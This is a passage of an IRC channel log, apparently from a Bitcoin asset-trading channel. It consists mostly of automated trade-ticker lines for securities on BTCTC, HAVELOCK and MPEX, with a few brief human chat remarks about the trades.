BTC [-] Jul 24 10:15:13 [HAVELOCK] [HIM] 2 @ 0.22300001 = 0.446 BTC [-] Jul 24 10:15:19 [HAVELOCK] [HIM] 5 @ 0.223 = 1.115 BTC [-] Jul 24 10:15:25 [HAVELOCK] [HIM] 40 @ 0.22 = 8.8 BTC [-] Jul 24 10:16:11 [BTCTC] [AMC-PT] 30 @ 0.003849 = 0.1155 BTC [+] Jul 24 10:20:43 [BTCTC] [DMS.SELLING] 7 @ 0.02139 = 0.1497 BTC [+] Jul 24 10:22:55 [BTCTC] [AMC-PT] 50 @ 0.003849 = 0.1925 BTC [+] Jul 24 10:27:36 [HAVELOCK] [HIM] 1 @ 0.262 BTC [+] Jul 24 10:30:11 [BTCTC] [TAT.MINIGAME] 120 @ 0.000521 = 0.0625 BTC [-] Jul 24 10:30:15 [BTCTC] [CRYPTO-TRADE] 13 @ 0.199 = 2.587 BTC [+] Jul 24 10:34:04 [BTCTC] [DMS.SELLING] 70 @ 0.02139 = 1.4973 BTC [+] Jul 24 10:35:37 [BTCTC] [TAT.MINIGAME] 475 @ 0.000521 = 0.2475 BTC [-] Jul 24 10:36:19 [HAVELOCK] [AM100] 20 @ 0.0433 = 0.866 BTC [-] Jul 24 10:36:38 [BTCTC] [TAT.VIRTUALMINE] 500 @ 0.00305 = 1.525 BTC [-] Jul 24 10:37:41 [BTCTC] [TAT.VIRTUALMINE] 60 @ 0.003 = 0.18 BTC [-] Jul 24 10:40:20 [BTCTC] [DMS.SELLING] 54 @ 0.02139 = 1.1551 BTC [+] Jul 24 10:40:22 [BTCTC] [DMS.SELLING] 16 @ 0.02139 = 0.3422 BTC [+] Jul 24 10:40:36 [BTCTC] [BASIC-MINING] 1 @ 0.5879 BTC [+] Jul 24 10:40:38 [BTCTC] [BASIC-MINING] 3 @ 0.5879 = 1.7637 BTC [+] Jul 24 10:40:40 [BTCTC] [BASIC-MINING] 5 @ 0.5883 = 2.9415 BTC [+] Jul 24 10:40:50 [BTCTC] [DMS.SELLING] 3 @ 0.02139 = 0.0642 BTC [+] Jul 24 10:40:53 [BTCTC] [TAT.ASICMINER] 1 @ 0.04651 BTC [+] Jul 24 10:42:12 [BTCTC] [TAT.MINIGAME] 24 @ 0.000521 = 0.0125 BTC [-] Jul 24 10:43:15 [BTCTC] [ASICMINER-PT] 1 @ 4.788 BTC [+] Jul 24 10:43:18 [BTCTC] [ASICMINER-PT] 1 @ 4.788 BTC [+] Jul 24 10:45:15 [BTCTC] [TAT.ASICMINER] 4 @ 0.04651 = 0.186 BTC [+] Jul 24 10:45:41 [BTCTC] [TAT.ASICMINER] 129 @ 0.04651 = 5.9998 BTC [+] Jul 24 10:45:46 [BTCTC] [TAT.ASICMINER] 21 @ 0.04651 = 0.9767 BTC [+] Jul 24 10:47:11 [HAVELOCK] [AM100] 33 @ 0.0446999 = 1.4751 BTC [+] Jul 24 10:47:17 [BTCTC] [TAT.MINIGAME] 10 @ 0.000521 = 0.0052 BTC [-] Jul 24 10:48:05 [BTCTC] [DMS.SELLING] 5 @ 0.02139 = 0.107 BTC [+] Jul 24 10:51:19 [HAVELOCK] [SDSTM] 1 @ 0.01099997 BTC [+] Jul 24 10:54:34 [BTCTC] [TAT.ASICMINER] 20 @ 0.04651 = 0.9302 BTC [+] Jul 24 10:56:51 [BTCTC] [GSDPT] 20 @ 0.00345 = 0.069 BTC [+] Jul 24 11:12:01 [BTCTC] [AMC-PT] 100 @ 0.003792 = 0.3792 BTC [-] Jul 24 11:12:41 [BTCTC] [B.YABMC] 1 @ 0.00256 BTC [-] Jul 24 11:13:30 [BTCTC] [B.YABMC] 25 @ 0.00299 = 0.0748 BTC [+] Jul 24 11:14:49 [BTCTC] [B.YABMC] 100 @ 0.003 = 0.3 BTC [+] Jul 24 11:16:30 [BTCTC] [BASIC-MINING] 1 @ 0.5883 BTC [+] Jul 24 11:21:34 [BTCTC] [AMC-PT] 15 @ 0.003849 = 0.0577 BTC [+] Jul 24 11:29:55 [BTCTC] [TAT.MINIGAME] 371 @ 0.000521 = 0.1933 BTC [-] Jul 24 11:34:36 [BTCTC] [ASICMINER-PT] 5 @ 4.788 = 23.94 BTC [+] Jul 24 11:34:55 [BTCTC] [AMC-PT] 100 @ 0.003792 = 0.3792 BTC [-] Jul 24 11:34:57 [BTCTC] [AMC-PT] 1000 @ 0.00379 = 3.79 BTC [-] Jul 24 11:34:59 [BTCTC] [AMC-PT] 50 @ 0.003752 = 0.1876 BTC [-] Jul 24 11:35:00 [BTCTC] [TAT.VIRTUALMINE] 500 @ 0.003 = 1.5 BTC [-] Jul 24 11:35:02 [BTCTC] [AMC-PT] 100 @ 0.003751 = 0.3751 BTC [-] Jul 24 11:35:04 [BTCTC] [AMC-PT] 84 @ 0.003722 = 0.3126 BTC [-] Jul 24 11:35:04 [BTCTC] [AMC-PT] 80 @ 0.003721 = 0.2977 BTC [-] Jul 24 11:35:06 [BTCTC] [AMC-PT] 88 @ 0.00372 = 0.3274 BTC [-] Jul 24 11:35:08 [BTCTC] [AMC-PT] 50 @ 0.003716 = 0.1858 BTC [-] Jul 24 11:35:09 [BTCTC] [AMC-PT] 100 @ 0.003715 = 0.3715 BTC [-] Jul 24 11:35:11 [BTCTC] [AMC-PT] 1000 @ 0.00371 = 3.71 BTC [-] Jul 24 11:35:13 [BTCTC] [AMC-PT] 2000 @ 0.003709 = 7.418 BTC [-] Jul 24 11:35:15 [BTCTC] [AMC-PT] 641 @ 0.003706 = 2.3755 BTC [-] Jul 24 11:35:16 [BTCTC] [AMC-PT] 283 @ 0.003705 = 1.0485 BTC [-] Jul 24 11:35:17 [BTCTC] [AMC-PT] 924 @ 0.003705 = 3.4234 BTC [-] Jul 24 11:36:32 [BTCTC] [DMS.SELLING] 1 @ 0.02002 BTC [-] Jul 24 11:36:46 [BTCTC] [DMS.MINING] 1 @ 0.0141 BTC [-] Jul 24 11:37:28 [BTCTC] [DMS.PURCHASE] 1 @ 0.03379 BTC [+] Jul 24 11:43:33 [BTCTC] [DMS.MINING] 99 @ 0.0141 = 1.3959 BTC [-] Jul 24 11:43:35 [BTCTC] [DMS.MINING] 100 @ 0.014 = 1.4 BTC [-] Jul 24 11:43:37 [BTCTC] [DMS.MINING] 31 @ 0.01375 = 0.4263 BTC [-] Jul 24 11:44:23 [BTCTC] [TAT.MINIGAME] 1 @ 0.00069 BTC [+] Jul 24 11:45:05 [MPEX] [S.MG] 15000 @ 0.00025 = 3.75 BTC [-] Jul 24 11:45:18 [HAVELOCK] [AM100] 1 @ 0.0446999 BTC [+] Jul 24 11:45:23 [BTCTC] [TAT.MINIGAME] 20 @ 0.000796 = 0.0159 BTC [+] Jul 24 11:46:23 [BTCTC] [TAT.MINIGAME] 667 @ 0.000374 = 0.2495 BTC [-] Jul 24 11:46:33 [BTCTC] [TAT.MINIGAME] 1 @ 0.000373 BTC [-] Jul 24 11:46:35 [BTCTC] [TAT.MINIGAME] 1000 @ 0.000371 = 0.371 BTC [-] Jul 24 11:46:37 [BTCTC] [TAT.MINIGAME] 600 @ 0.00037 = 0.222 BTC [-] Jul 24 11:46:39 [BTCTC] [TAT.MINIGAME] 3 @ 0.000359 = 0.0011 BTC [-] Jul 24 11:46:40 [BTCTC] [TAT.MINIGAME] 250 @ 0.000344 = 0.086 BTC [-] Jul 24 11:46:42 [BTCTC] [TAT.MINIGAME] 1000 @ 0.00032 = 0.32 BTC [-] Jul 24 11:46:43 [BTCTC] [TAT.MINIGAME] 100 @ 0.000288 = 0.0288 BTC [-] Jul 24 11:46:55 [HAVELOCK] [SMG] 61 @ 0.000287 = 0.0175 BTC [-] Jul 24 11:47:25 [BTCTC] [TAT.ASICMINER] 40 @ 0.04541 = 1.8164 BTC [-] Jul 24 11:47:39 [BTCTC] [TAT.ASICMINER] 10 @ 0.04541 = 0.4541 BTC [-] Jul 24 11:49:21 [HAVELOCK] [SMG] 1000 @ 0.000281 = 0.281 BTC [-] Jul 24 11:49:24 [HAVELOCK] [SMG] 241 @ 0.00028 = 0.0675 BTC [-] Jul 24 11:51:46 [BTCTC] [TAT.MINIGAME] 1033 @ 0.000288 = 0.2975 BTC [-] Jul 24 11:52:30 [BTCTC] [DMS.PURCHASE] 90 @ 0.03379 = 3.0411 BTC [+] Jul 24 11:54:14 [BTCTC] [TAT.ASICMINER] 3 @ 0.04651 = 0.1395 BTC [+] Jul 24 12:04:02 [BTCTC] [BASIC-MINING] 1 @ 0.5247 BTC [-] Jul 24 12:04:04 [BTCTC] [BASIC-MINING] 5 @ 0.5246 = 2.623 BTC [-] Jul 24 12:04:06 [BTCTC] [BASIC-MINING] 9 @ 0.5246 = 4.7214 BTC [-] Jul 24 12:04:08 [BTCTC] [BASIC-MINING] 2 @ 0.5245 = 1.049 BTC [-] Jul 24 12:04:09 [BTCTC] [BASIC-MINING] 1 @ 0.5244 BTC [-] Jul 24 12:04:11 [BTCTC] [BASIC-MINING] 1 @ 0.5243 BTC [-] Jul 24 12:04:11 [BTCTC] [BASIC-MINING] 11 @ 0.5242 = 5.7662 BTC [-] Jul 24 12:04:13 [BTCTC] [BASIC-MINING] 1 @ 0.5231 BTC [-] Jul 24 12:04:14 [BTCTC] [BASIC-MINING] 31 @ 0.523 = 16.213 BTC [-] Jul 24 12:04:16 [BTCTC] [BASIC-MINING] 52 @ 0.521 = 27.092 BTC [-] Jul 24 12:04:17 [BTCTC] [BASIC-MINING] 15 @ 0.52 = 7.8 BTC [-] Jul 24 12:04:18 [BTCTC] [BASIC-MINING] 1 @ 0.52 BTC [-] Jul 24 12:05:53 [MPEX] [S.MPOE] 2000 @ 0.000793 = 1.586 BTC [-] Jul 24 12:05:55 [MPEX] [S.MPOE] 16250 @ 0.00079224 = 12.8739 BTC [-] Jul 24 12:05:59 [MPEX] [S.MPOE] 12709 @ 0.00079206 = 10.0663 BTC [-] Jul 24 12:06:17 [BTCTC] [ASICMINER-PT] 1 @ 4.789 BTC [+] Jul 24 12:09:53 [BTCTC] [COGNITIVE] 14 @ 0.6801 = 9.5214 BTC [+] Jul 24 12:09:54 [BTCTC] [COGNITIVE] 5 @ 0.68 = 3.4 BTC [-] Jul 24 12:09:55 [BTCTC] [COGNITIVE] 1 @ 0.6705 BTC [-] Jul 24 12:09:57 [BTCTC] [COGNITIVE] 5 @ 0.67 = 3.35 BTC [-] Jul 24 12:09:58 [BTCTC] [COGNITIVE] 30 @ 0.6628 = 19.884 BTC [-] Jul 24 12:10:00 [BTCTC] [COGNITIVE] 15 @ 0.6625 = 9.9375 BTC [-] Jul 24 12:10:01 [BTCTC] [COGNITIVE] 30 @ 0.6615 = 19.845 BTC [-] Jul 24 12:13:03 [BTCTC] [BASIC-MINING] 1 @ 0.512 BTC [-] Jul 24 12:13:17 [BTCTC] [TAT.ASICMINER] 1 @ 0.0454 BTC [-] Jul 24 12:13:37 [BTCTC] [DMS.MINING] 29 @ 0.01375 = 0.3988 BTC [-] Jul 24 12:13:39 [BTCTC] [DMS.MINING] 80 @ 0.0135 = 1.08 BTC [-] Jul 24 12:13:40 [BTCTC] [DMS.MINING] 400 @ 0.0135 = 5.4 BTC [-] Jul 24 12:14:14 [BTCTC] [TAT.MINIGAME] 667 @ 0.000429 = 0.2861 BTC [+] Jul 24 12:14:16 [BTCTC] [TAT.MINIGAME] 100 @ 0.00043 = 0.043 BTC [+] Jul 24 12:15:09 [BTCTC] [DMS.PURCHASE] 500 @ 0.03379 = 16.895 BTC [+] Jul 24 12:15:49 [HAVELOCK] [SMG] 10 @ 0.00028 = 0.0028 BTC [-] Jul 24 12:19:31 [BTCTC] [TAT.ASICMINER] 118 @ 0.0454 = 5.3572 BTC [-] Jul 24 12:19:33 [BTCTC] [TAT.ASICMINER] 9 @ 0.0454 = 0.4086 BTC [-] Jul 24 12:23:00 [BTCTC] [TAT.ASICMINER] 2 @ 0.0465 = 0.093 BTC [+] Jul 24 12:24:48 [MPEX] [S.MPOE] 1591 @ 0.00079206 = 1.2602 BTC [-] Jul 24 12:24:53 [BTCTC] [TAT.ASICMINER] 6 @ 0.04651 = 0.2791 BTC [+] Jul 24 12:24:55 [BTCTC] [TAT.ASICMINER] 2 @ 0.04651 = 0.093 BTC [+] Jul 24 12:25:13 [BTCTC] [DMS.MINING] 45 @ 0.01326 = 0.5967 BTC [-] Jul 24 12:27:39 [BTCTC] [ASICMINER-PT] 1 @ 4.788 BTC [-] Jul 24 12:28:01 [BTCTC] [DMS.SELLING] 29 @ 0.021 = 0.609 BTC [+] Jul 24 12:29:59 [BTCTC] [CRYPTO-TRADE] 10 @ 0.1935 = 1.935 BTC [-] Jul 24 12:30:01 [BTCTC] [CRYPTO-TRADE] 8 @ 0.193 = 1.544 BTC [-] Jul 24 12:30:03 [BTCTC] [CRYPTO-TRADE] 5 @ 0.192 = 0.96 BTC [-] Jul 24 12:30:04 [BTCTC] [CRYPTO-TRADE] 10 @ 0.192 = 1.92 BTC [-] Jul 24 12:30:06 [BTCTC] [CRYPTO-TRADE] 1 @ 0.1919 BTC [-] Jul 24 12:30:07 [BTCTC] [CRYPTO-TRADE] 1 @ 0.1918 BTC [-] Jul 24 12:30:08 [BTCTC] [CRYPTO-TRADE] 1 @ 0.1917 BTC [-] Jul 24 12:30:10 [BTCTC] [CRYPTO-TRADE] 1 @ 0.1916 BTC [-] Jul 24 12:30:11 [BTCTC] [CRYPTO-TRADE] 1 @ 0.1914 BTC [-] Jul 24 12:30:12 [BTCTC] [CRYPTO-TRADE] 1 @ 0.1913 BTC [-] Jul 24 12:30:14 [BTCTC] [CRYPTO-TRADE] 1 @ 0.1911 BTC [-] Jul 24 12:30:14 [BTCTC] [CRYPTO-TRADE] 1 @ 0.191 BTC [-] Jul 24 12:30:15 [BTCTC] [CRYPTO-TRADE] 1 @ 0.191 BTC [-] Jul 24 12:30:17 [BTCTC] [CRYPTO-TRADE] 8 @ 0.191 = 1.528 BTC [-] Jul 24 12:32:01 [BTCTC] [TAT.VIRTUALMINE] 529 @ 0.00308 = 1.6293 BTC [+] Jul 24 12:32:24 [BTCTC] [TAT.VIRTUALMINE] 100 @ 0.0031 = 0.31 BTC [+] Jul 24 12:33:46 [BTCTC] [DMS.MINING] 45 @ 0.01415 = 0.6368 BTC [+] Jul 24 12:36:33 [BTCTC] [DMS.MINING] 41 @ 0.01469 = 0.6023 BTC [+] Jul 24 12:36:53 [BTCTC] [TAT.VIRTUALMINE] 5 @ 0.003239 = 0.0162 BTC [+] Jul 24 12:45:04 [BTCTC] [DMS.MINING] 3 @ 0.01415 = 0.0425 BTC [-] Jul 24 12:46:43 [BTCTC] [DMS.SELLING] 85 @ 0.021 = 1.785 BTC [+] Jul 24 12:47:22 [BTCTC] [DMS.SELLING] 3 @ 0.02099 = 0.063 BTC [-] Jul 24 12:53:27 [BTCTC] [DMS.PURCHASE] 3 @ 0.03379 = 0.1014 BTC [+] Jul 24 13:04:52 [HAVELOCK] [HIM] 1 @ 0.23 BTC [-] Jul 24 13:06:13 [BTCTC] [AMC-PT] 283 @ 0.00378 = 1.0697 BTC [+] Jul 24 13:13:23 [BTCTC] [AMC-PT] 1 @ 0.003797 BTC [+] Jul 24 13:13:31 [BTCTC] [AMC-PT] 1017 @ 0.00378 = 3.8443 BTC [-] Jul 24 13:13:32 [BTCTC] [AMC-PT] 13 @ 0.00377 = 0.049 BTC [-] Jul 24 13:13:34 [BTCTC] [AMC-PT] 848 @ 0.00375 = 3.18 BTC [-] Jul 24 13:15:26 [HAVELOCK] [HIM] 1 @ 0.225 BTC [-] Jul 24 13:15:36 [HAVELOCK] [HIM] 1 @ 0.22 BTC [-] Jul 24 13:16:03 [HAVELOCK] [HIM] 1 @ 0.25499999 BTC [+] Jul 24 13:18:54 [BTCTC] [TAT.ASICMINER] 2 @ 0.04652 = 0.093 BTC [+] Jul 24 13:21:02 [HAVELOCK] [HIM] 2 @ 0.2303 = 0.4606 BTC [-] Jul 24 13:24:40 awww Jul 24 13:24:42 [BTCTC] [DMS.MINING] 100 @ 0.01415 = 1.415 BTC [-] Jul 24 13:24:46 MPOE-PR just warmed my heart Jul 24 13:24:49 :) Jul 24 13:25:02 [BTCTC] [AMC-PT] 152 @ 0.00375 = 0.57 BTC [-] Jul 24 13:25:04 [BTCTC] [AMC-PT] 40 @ 0.003711 = 0.1484 BTC [-] Jul 24 13:25:06 [BTCTC] [AMC-PT] 80 @ 0.00371 = 0.2968 BTC [-] Jul 24 13:25:08 [BTCTC] [AMC-PT] 38 @ 0.003706 = 0.1408 BTC [-] Jul 24 13:25:09 [BTCTC] [AMC-PT] 17 @ 0.003706 = 0.063 BTC [-] Jul 24 13:25:10 [BTCTC] [AMC-PT] 76 @ 0.003705 = 0.2816 BTC [-] Jul 24 13:25:11 [BTCTC] [AMC-PT] 423 @ 0.003671 = 1.5528 BTC [-] Jul 24 13:30:02 what'd she do ? Jul 24 13:36:12 [MPEX] [S.MPOE] 22600 @ 0.00079052 = 17.8658 BTC [-] Jul 24 13:36:53 [BTCTC] [TAT.ASICMINER] 20 @ 0.04575 = 0.915 BTC [-] Jul 24 13:36:56 [BTCTC] [TAT.ASICMINER] 1 @ 0.04575 BTC [-] Jul 24 13:37:31 [BTCTC] [TAT.ASICMINER] 60 @ 0.0458 = 2.748 BTC [+] Jul 24 13:38:12 #bitcoin-assets Jul 24 13:38:21 woops Jul 24 13:38:40 [BTCTC] [TAT.ASICMINER] 4 @ 0.0458 = 0.1832 BTC [+] Jul 24 13:39:54 [BTCTC] [TAT.ASICMINER] 4 @ 0.0463 = 0.1852 BTC [+] Jul 24 13:40:34 [BTCTC] [TAT.ASICMINER] 8 @ 0.04652 = 0.3722 BTC [+] Jul 24 13:40:37 [BTCTC] [TAT.ASICMINER] 1 @ 0.04652 BTC [+] Jul 24 13:41:17 [BTCTC] [TAT.ASICMINER] 2 @ 0.046989 = 0.094 BTC [+] Jul 24 13:42:32 [BTCTC] [AMC-PT] 91 @ 0.003795 = 0.3453 BTC [+] Jul 24 13:42:36 [MPEX] [S.MPOE] 12659 @ 0.00079122 = 10.0161 BTC [+] Jul 24 13:42:39 [MPEX] [S.MPOE] 4772 @ 0.00079343 = 3.7862 BTC [+] Jul 24 13:43:34 [BTCTC] [DMS.MINING] 26 @ 0.01469 = 0.3819 BTC [+] Jul 24 13:48:57 [BTCTC] [AMC-PT] 32 @ 0.003675 = 0.1176 BTC [-] Jul 24 13:48:58 [BTCTC] [AMC-PT] 65 @ 0.003674 = 0.2388 BTC [-] Jul 24 13:49:00 [BTCTC] [AMC-PT] 900 @ 0.003671 = 3.3039 BTC [-] Jul 24 13:49:01 [BTCTC] [AMC-PT] 53 @ 0.00367 = 0.1945 BTC [-] Jul 24 13:49:03 [BTCTC] [AMC-PT] 3000 @ 0.00367 = 11.01 BTC [-] Jul 24 14:10:13 [MPEX] [S.MPOE] 12798 @ 0.00080013 = 10.2401 BTC [+] Jul 24 14:10:38 [HAVELOCK] [AM100] 50 @ 0.04469987 = 2.235 BTC [-] Jul 24 14:11:25 [BTCTC] [TAT.VIRTUALMINE] 250 @ 0.003 = 0.75 BTC [-] Jul 24 14:11:27 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.003 BTC [-] Jul 24 14:12:40 [BTCTC] [AMC-PT] 16 @ 0.003701 = 0.0592 BTC [+] Jul 24 14:13:46 [BTCTC] [BASIC-MINING] 48 @ 0.5261 = 25.2528 BTC [+] Jul 24 14:14:00 [BTCTC] [DMS.SELLING] 25 @ 0.0201 = 0.5025 BTC [-] Jul 24 14:15:05 [BTCTC] [PAJKA.BOND] 1 @ 0.038 BTC [-] Jul 24 14:15:06 [BTCTC] [PAJKA.BOND] 2 @ 0.038 = 0.076 BTC [-] Jul 24 14:16:00 [MPEX] [S.MPOE] 10900 @ 0.00080013 = 8.7214 BTC [+] Jul 24 14:16:57 [BTCTC] [ASICMINER-PT] 2 @ 4.726 = 9.452 BTC [-] Jul 24 14:23:18 [BTCTC] [AMC-PT] 297 @ 0.0037 = 1.0989 BTC [-] Jul 24 14:23:36 [BTCTC] [DMS.SELLING] 5 @ 0.0201 = 0.1005 BTC [-] Jul 24 14:30:45 [BTCTC] [DMS.SELLING] 10 @ 0.0201 = 0.201 BTC [-] Jul 24 14:32:49 [BTCTC] [DMS.SELLING] 8 @ 0.021 = 0.168 BTC [+] Jul 24 14:34:40 [HAVELOCK] [AM100] 1 @ 0.0444 BTC [-] Jul 24 14:38:48 [HAVELOCK] [AM100] 4 @ 0.0444 = 0.1776 BTC [-] Jul 24 14:42:08 [HAVELOCK] [AM100] 21 @ 0.0437 = 0.9177 BTC [-] Jul 24 14:42:11 [HAVELOCK] [AM100] 7 @ 0.0436999 = 0.3059 BTC [-] Jul 24 14:45:39 [HAVELOCK] [VTX] 2 @ 0.5879 = 1.1758 BTC [+] Jul 24 14:45:57 [HAVELOCK] [SDSTM] 3 @ 0.01099 = 0.033 BTC [-] Jul 24 14:47:46 [HAVELOCK] [SDSTM] 2 @ 0.01099 = 0.022 BTC [-] Jul 24 14:48:07 [HAVELOCK] [SDSTM] 3 @ 0.0101 = 0.0303 BTC [-] Jul 24 14:48:20 [HAVELOCK] [SDSTM] 10 @ 0.01 = 0.1 BTC [-] Jul 24 14:48:22 [HAVELOCK] [SDSTM] 391 @ 0.01 = 3.91 BTC [-] Jul 24 14:53:27 [BTCTC] [AMC-PT] 6 @ 0.0037 = 0.0222 BTC [-] Jul 24 14:54:40 [HAVELOCK] [SMG] 7 @ 0.0002799 = 0.002 BTC [-] Jul 24 14:54:55 [HAVELOCK] [SMG] 1 @ 0.00028 BTC [+] Jul 24 14:56:08 [BTCTC] [TAT.ASICMINER] 6 @ 0.046989 = 0.2819 BTC [+] Jul 24 15:00:52 [BTCTC] [TAT.ASICMINER] 5 @ 0.047 = 0.235 BTC [+] Jul 24 15:00:54 [BTCTC] [TAT.ASICMINER] 5 @ 0.047 = 0.235 BTC [+] Jul 24 15:05:38 [BTCTC] [TAT.ASICMINER] 23 @ 0.047 = 1.081 BTC [+] Jul 24 15:05:40 [BTCTC] [TAT.ASICMINER] 10 @ 0.047 = 0.47 BTC [+] Jul 24 15:06:36 [BTCTC] [TAT.ASICMINER] 14 @ 0.04728 = 0.6619 BTC [+] Jul 24 15:08:20 [HAVELOCK] [SDSTM] 3 @ 0.01099 = 0.033 BTC [+] Jul 24 15:11:49 [BTCTC] [TAT.ASICMINER] 59 @ 0.04728 = 2.7895 BTC [+] Jul 24 15:20:13 [BTCTC] [TAT.VIRTUALMINE] 5 @ 0.003 = 0.015 BTC [-] Jul 24 15:28:58 [BTCTC] [TAT.ASICMINER] 1 @ 0.04728 BTC [+] Jul 24 15:36:10 [BTCTC] [TAT.ASICMINER] 1 @ 0.04698 BTC [-] Jul 24 15:36:38 [BTCTC] [AMC-PT] 100 @ 0.003666 = 0.3666 BTC [-] Jul 24 15:36:55 [BTCTC] [TAT.ASICMINER] 1 @ 0.04698 BTC [-] Jul 24 15:37:44 [BTCTC] [TAT.ASICMINER] 1 @ 0.04698 BTC [-] Jul 24 15:38:18 [BTCTC] [TAT.ASICMINER] 1 @ 0.04698 BTC [-] Jul 24 15:38:53 [BTCTC] [AMC-PT] 5 @ 0.003666 = 0.0183 BTC [-] Jul 24 15:38:55 [BTCTC] [AMC-PT] 15 @ 0.003653 = 0.0548 BTC [-] Jul 24 15:38:56 [BTCTC] [AMC-PT] 980 @ 0.003653 = 3.5799 BTC [-] Jul 24 15:39:03 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.003238 BTC [+] Jul 24 15:39:11 [BTCTC] [TAT.ASICMINER] 1 @ 0.04698 BTC [-] Jul 24 15:39:23 [BTCTC] [AMC-PT] 400 @ 0.003653 = 1.4612 BTC [-] Jul 24 15:42:22 [BTCTC] [TAT.ASICMINER] 7 @ 0.04728 = 0.331 BTC [+] Jul 24 15:43:14 [BTCTC] [AMC-PT] 1620 @ 0.003653 = 5.9179 BTC [-] Jul 24 15:45:28 [BTCTC] [AMC-PT] 134 @ 0.003609 = 0.4836 BTC [-] Jul 24 15:45:37 [BTCTC] [TAT.ASICMINER] 3 @ 0.04729 = 0.1419 BTC [+] Jul 24 15:46:29 [MPEX] [S.MG] 10000 @ 0.00025 = 2.5 BTC [-] Jul 24 15:48:57 [BTCTC] [GSDPT] 1 @ 0.00345 BTC [+] Jul 24 15:51:09 [BTCTC] [TAT.MINIGAME] 20 @ 0.00031 = 0.0062 BTC [-] Jul 24 15:51:11 [BTCTC] [TAT.MINIGAME] 1 @ 0.000291 BTC [-] Jul 24 15:51:13 [BTCTC] [TAT.MINIGAME] 5 @ 0.000289 = 0.0014 BTC [-] Jul 24 15:51:15 [BTCTC] [TAT.MINIGAME] 2663 @ 0.000281 = 0.7483 BTC [-] Jul 24 15:51:16 [BTCTC] [TAT.MINIGAME] 4000 @ 0.00028 = 1.12 BTC [-] Jul 24 15:51:50 minigame? Jul 24 15:52:27 hmmm Jul 24 15:53:08 [HAVELOCK] [SDSTM] 1 @ 0.0101 BTC [-] Jul 24 15:55:35 [BTCTC] [DMS.SELLING] 1 @ 0.021 BTC [+] Jul 24 15:55:50 [BTCTC] [DMS.PURCHASE] 1 @ 0.03379 BTC [+] Jul 24 15:56:03 [BTCTC] [AMC-PT] 500 @ 0.003608 = 1.804 BTC [-] Jul 24 15:56:05 [BTCTC] [AMC-PT] 3900 @ 0.003591 = 14.0049 BTC [-] Jul 24 15:56:06 [BTCTC] [AMC-PT] 3766 @ 0.003571 = 13.4484 BTC [-] Jul 24 15:56:29 [HAVELOCK] [SMG] 2 @ 0.000275 = 0.0006 BTC [-] Jul 24 15:57:49 [BTCTC] [DMS.MINING] 1 @ 0.01464 BTC [-] Jul 24 15:58:47 [BTCTC] [TAT.MINIGAME] 1 @ 0.00028 BTC [-] Jul 24 15:58:54 So I noticed under ActiveMining, they have 25mil shares to issue and AMC has just 5mil shares Jul 24 15:59:00 [BTCTC] [AMC-PT] 2 @ 0.003572 = 0.0071 BTC [+] Jul 24 15:59:18 [BTCTC] [AMC-PT] 47 @ 0.003571 = 0.1678 BTC [-] Jul 24 15:59:20 [BTCTC] [AMC-PT] 353 @ 0.003551 = 1.2535 BTC [-] Jul 24 15:59:45 [BTCTC] [AMC-PT] 300 @ 0.003551 = 1.0653 BTC [-] Jul 24 16:00:11 [BTCTC] [AMC-PT] 47 @ 0.003551 = 0.1669 BTC [-] Jul 24 16:00:34 [BTCTC] [AMC-PT] 2 @ 0.00355 = 0.0071 BTC [-] Jul 24 16:00:50 [BTCTC] [AMC-PT] 15 @ 0.003522 = 0.0528 BTC [-] Jul 24 16:01:06 [BTCTC] [AMC-PT] 125 @ 0.003522 = 0.4403 BTC [-] Jul 24 16:04:03 [BTCTC] [AMC-PT] 860 @ 0.003522 = 3.0289 BTC [-] Jul 24 16:05:59 [BTCTC] [AMC-PT] 65 @ 0.00352 = 0.2288 BTC [-] Jul 24 16:07:22 [BTCTC] [TAT.ASICMINER] 1 @ 0.04729 BTC [+] Jul 24 16:07:45 [BTCTC] [AMC-PT] 185 @ 0.00352 = 0.6512 BTC [-] Jul 24 16:07:59 [BTCTC] [AMC-PT] 10 @ 0.00353 = 0.0353 BTC [+] Jul 24 16:08:10 [BTCTC] [AMC-PT] 50 @ 0.003513 = 0.1757 BTC [-] Jul 24 16:08:27 [BTCTC] [AMC-PT] 4 @ 0.003512 = 0.014 BTC [-] Jul 24 16:08:29 [BTCTC] [AMC-PT] 15 @ 0.003512 = 0.0527 BTC [-] Jul 24 16:08:31 [BTCTC] [AMC-PT] 450 @ 0.003512 = 1.5804 BTC [-] Jul 24 16:09:05 [BTCTC] [AMC-PT] 2976 @ 0.003511 = 10.4487 BTC [-] Jul 24 16:09:07 [BTCTC] [AMC-PT] 120 @ 0.003511 = 0.4213 BTC [-] Jul 24 16:09:29 [BTCTC] [AMC-PT] 1500 @ 0.003501 = 5.2515 BTC [-] Jul 24 16:09:40 [BTCTC] [AMC-PT] 30 @ 0.003404 = 0.1021 BTC [-] Jul 24 16:09:50 [BTCTC] [AMC-PT] 100 @ 0.003404 = 0.3404 BTC [-] Jul 24 16:10:07 [BTCTC] [AMC-PT] 50 @ 0.003401 = 0.1701 BTC [-] Jul 24 16:10:31 [BTCTC] [AMC-PT] 50 @ 0.003401 = 0.1701 BTC [-] Jul 24 16:10:33 [BTCTC] [AMC-PT] 500 @ 0.003401 = 1.7005 BTC [-] Jul 24 16:10:47 [BTCTC] [AMC-PT] 1 @ 0.0034 BTC [-] Jul 24 16:11:03 [BTCTC] [AMC-PT] 1110 @ 0.00338 = 3.7518 BTC [-] Jul 24 16:11:29 [BTCTC] [DMS.PURCHASE] 30 @ 0.03379 = 1.0137 BTC [+] Jul 24 16:11:40 [BTCTC] [AMC-PT] 30 @ 0.00336 = 0.1008 BTC [-] Jul 24 16:11:59 [BTCTC] [AMC-PT] 30 @ 0.003303 = 0.0991 BTC [-] Jul 24 16:12:16 [BTCTC] [AMC-PT] 1000 @ 0.0033 = 3.3 BTC [-] Jul 24 16:12:58 [BTCTC] [AMC-PT] 25 @ 0.00329 = 0.0823 BTC [-] Jul 24 16:13:12 [BTCTC] [AMC-PT] 1000 @ 0.00329 = 3.29 BTC [-] Jul 24 16:13:30 [BTCTC] [AMC-PT] 73 @ 0.0033 = 0.2409 BTC [+] Jul 24 16:18:23 [BTCTC] [TAT.ASICMINER] 10 @ 0.04698 = 0.4698 BTC [-] Jul 24 16:19:04 [BTCTC] [PAJKA.BOND] 45 @ 0.04689 = 2.1101 BTC [+] Jul 24 16:19:21 [BTCTC] [DMS.PURCHASE] 5 @ 0.03379 = 0.169 BTC [+] Jul 24 16:20:41 [BTCTC] [TAT.MINIGAME] 1 @ 0.00027 BTC [-] Jul 24 16:24:11 